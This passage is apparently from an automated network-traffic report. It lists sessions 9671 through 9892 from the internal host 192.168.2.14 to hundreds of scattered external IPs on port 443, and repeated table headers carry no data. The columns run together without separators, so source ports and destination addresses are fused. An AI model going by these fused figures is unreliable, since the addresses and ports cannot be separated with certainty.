                                      9671192.168.2.146082864.221.240.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9672192.168.2.1447208134.64.6.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9673192.168.2.1445332220.181.121.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9674192.168.2.1434072180.7.61.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9675192.168.2.145900024.171.73.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9676192.168.2.144084670.136.49.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9677192.168.2.1453092136.141.221.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9678192.168.2.1450420150.143.240.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9679192.168.2.1441576205.5.34.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9680192.168.2.1443798219.138.10.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9681192.168.2.143578079.81.227.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9682192.168.2.145233434.71.163.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9683192.168.2.1437852156.45.108.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9684192.168.2.144066461.4.83.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9685192.168.2.1455674108.19.61.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9686192.168.2.1445468108.45.115.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9687192.168.2.145625497.181.33.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9688192.168.2.1445426212.244.39.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9689192.168.2.1434222163.198.224.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9690192.168.2.1436612156.82.235.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9691192.168.2.1438252181.242.82.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9692192.168.2.1446252168.152.145.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9693192.168.2.1447724216.184.86.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9694192.168.2.1452376146.21.190.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9695192.168.2.1448976199.188.117.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9696192.168.2.1457540184.2.16.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9697192.168.2.143532612.0.187.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9698192.168.2.143434449.175.48.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9699192.168.2.143794827.138.108.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9700192.168.2.1434580160.107.226.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9701192.168.2.1442332153.187.64.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9702192.168.2.1457896129.114.135.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9703192.168.2.143538820.74.190.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9704192.168.2.143570658.42.78.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9705192.168.2.1441712152.211.56.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9706192.168.2.14408904.160.252.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9707192.168.2.1432872185.36.125.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9708192.168.2.143459034.155.60.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9709192.168.2.143672640.109.97.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9710192.168.2.145592663.201.42.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9711192.168.2.1445838133.98.9.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9712192.168.2.1439286197.98.110.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9713192.168.2.144176299.108.14.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9714192.168.2.1433154142.107.121.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9715192.168.2.1448136178.191.56.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9716192.168.2.1436022124.15.100.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9717192.168.2.1455352135.41.253.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9718192.168.2.1446990153.116.254.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9719192.168.2.1455136159.2.42.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9720192.168.2.145463247.130.45.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9721192.168.2.1435732117.251.233.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9722192.168.2.145312660.98.181.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9723192.168.2.144272867.194.62.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9724192.168.2.143706454.111.247.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9725192.168.2.1442686201.184.118.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9726192.168.2.1442708119.112.248.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9727192.168.2.1440184119.94.181.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9728192.168.2.1437900128.227.40.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9729192.168.2.145802051.138.137.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9730192.168.2.1451770180.78.44.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9731192.168.2.143481046.93.90.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9732192.168.2.1455544221.156.118.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9733192.168.2.1437986180.15.84.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9734192.168.2.1443374168.176.94.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9735192.168.2.143628864.176.227.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9736192.168.2.1441860154.61.124.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9737192.168.2.1452404184.3.127.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9738192.168.2.144704474.124.218.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9739192.168.2.1436592152.139.95.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9740192.168.2.1452728106.61.76.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9741192.168.2.1442258112.131.246.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9742192.168.2.1447548139.32.246.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9743192.168.2.144421859.163.219.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9744192.168.2.144176223.150.102.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9745192.168.2.1441084106.12.45.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9746192.168.2.145511838.57.103.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9747192.168.2.146039897.13.53.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9748192.168.2.1448608102.103.113.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9749192.168.2.1455846175.111.81.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9750192.168.2.1446074162.81.124.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9751192.168.2.1448368165.90.19.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9752192.168.2.145136234.108.240.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9753192.168.2.145431467.67.14.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9754192.168.2.1440354172.128.160.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9755192.168.2.144689289.30.148.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9756192.168.2.1447358100.152.225.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9757192.168.2.1434630103.69.27.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9758192.168.2.1432886189.101.205.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9759192.168.2.144312079.88.157.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9760192.168.2.145606620.253.174.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9761192.168.2.144335480.120.61.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9762192.168.2.1457538109.213.61.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9763192.168.2.145062663.20.11.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9764192.168.2.1451352174.84.78.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9765192.168.2.1456036105.252.125.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9766192.168.2.1436682157.104.242.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9767192.168.2.1433160112.209.57.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9768192.168.2.1447764191.54.155.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9769192.168.2.1444776175.89.221.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9770192.168.2.1450114168.138.227.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9771192.168.2.1434202189.91.14.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9772192.168.2.1453888167.231.86.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9773192.168.2.1448092134.26.208.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9774192.168.2.1434998161.75.25.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9775192.168.2.1460470129.210.123.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9776192.168.2.1450726176.246.153.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9777192.168.2.1439674114.77.190.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9778192.168.2.1443378193.72.195.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9779192.168.2.143799077.127.218.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9780192.168.2.1436740163.141.125.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9781192.168.2.143530837.116.139.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9782192.168.2.1453358175.34.6.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9783192.168.2.145886836.53.44.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9784192.168.2.1452792133.42.50.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9785192.168.2.1438416145.95.241.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9786192.168.2.144801698.224.58.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9787192.168.2.1457704100.175.216.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9788192.168.2.143884631.91.179.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9789192.168.2.144723050.67.0.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9790192.168.2.145068867.179.121.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9791192.168.2.1453542159.24.72.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9792192.168.2.1457216118.90.41.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9793192.168.2.1440368107.253.127.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9794192.168.2.1445882185.205.112.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9795192.168.2.145506688.252.237.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9796192.168.2.1451918158.52.94.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9797192.168.2.143466097.83.210.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9798192.168.2.1434786212.26.62.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9799192.168.2.1454376130.104.204.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9800192.168.2.1450482184.37.49.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9801192.168.2.1454034188.237.109.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9802192.168.2.1440488197.91.238.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9803192.168.2.1457386129.162.187.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9804192.168.2.144214278.45.181.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9805192.168.2.143369284.65.138.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9806192.168.2.1438568116.81.218.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9807192.168.2.143316499.184.60.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9808192.168.2.1439314103.128.50.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9809192.168.2.1434674128.70.109.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9810192.168.2.145628077.250.3.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9811192.168.2.145334893.3.168.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9812192.168.2.1436602172.175.151.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9813192.168.2.143912479.118.76.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9814192.168.2.1458284106.231.116.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9815192.168.2.1456826110.250.207.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9816192.168.2.143859427.172.183.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9817192.168.2.145507667.88.3.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9818192.168.2.1450184173.92.173.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9819192.168.2.145857435.20.116.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9820192.168.2.144618849.19.104.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9821192.168.2.145509043.210.26.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9822192.168.2.1443560212.154.203.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9823192.168.2.1432804174.60.125.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9824192.168.2.1448944186.20.97.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9825192.168.2.1435368220.135.210.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9826192.168.2.1447616207.174.128.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9827192.168.2.145544279.127.138.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9828192.168.2.144694612.191.44.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9829192.168.2.1458636125.22.29.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9830192.168.2.144514644.73.36.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9831192.168.2.1454124182.53.134.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9832192.168.2.1447888172.188.83.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9833192.168.2.146027684.124.2.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9834192.168.2.1443548120.74.184.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9835192.168.2.1449598134.96.155.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9836192.168.2.1437878108.253.58.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9837192.168.2.1457426165.104.20.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9838192.168.2.145890437.12.97.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9839192.168.2.145536420.222.133.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9840192.168.2.1448724219.40.245.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9841192.168.2.1451902196.228.13.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9842192.168.2.1449608204.213.45.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9843192.168.2.1450502210.15.98.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9844192.168.2.145889219.52.242.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9845192.168.2.1440082211.199.177.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9846192.168.2.144489459.228.175.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9847192.168.2.1433776118.165.127.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9848192.168.2.143386491.84.223.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9849192.168.2.1447386147.155.185.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9850192.168.2.1448162199.143.132.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9851192.168.2.1440004120.206.174.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9852192.168.2.144407684.133.128.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9853192.168.2.144635019.42.151.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9854192.168.2.14368629.32.189.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9855192.168.2.143757691.167.156.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9856192.168.2.1437214119.122.54.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9857192.168.2.1454968154.217.100.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9858192.168.2.144313225.82.181.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9859192.168.2.144171645.142.95.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9860192.168.2.1450008181.246.126.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9861192.168.2.1447222109.238.70.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9862192.168.2.144312085.222.172.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9863192.168.2.1443916129.188.69.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9864192.168.2.1433588168.223.185.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9865192.168.2.144599077.80.163.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9866192.168.2.14451889.119.87.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9867192.168.2.144918639.230.197.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9868192.168.2.1441710196.9.160.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9869192.168.2.144485084.245.20.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9870192.168.2.1433060157.23.10.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9871192.168.2.1436566176.108.177.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9872192.168.2.1454584122.9.61.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9873192.168.2.144124685.42.63.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9874192.168.2.145223892.174.130.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9875192.168.2.145685080.192.6.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9876192.168.2.145451631.208.68.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9877192.168.2.1459838154.55.43.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9878192.168.2.1442230149.61.229.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9879192.168.2.144869054.201.105.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9880192.168.2.1457108130.201.48.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9881192.168.2.145635451.214.44.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9882192.168.2.144799437.29.119.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9883192.168.2.1433022169.155.227.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9884192.168.2.144951685.75.222.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9885192.168.2.143807020.95.85.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9886192.168.2.144594218.41.8.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9887192.168.2.1445352132.145.25.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9888192.168.2.144857466.133.57.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9889192.168.2.1442396158.44.58.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9890192.168.2.1453776195.102.134.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9891192.168.2.144914673.195.80.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9892192.168.2.1460400197.166.36.206443
                                      TimestampBytes transferredDirectionData


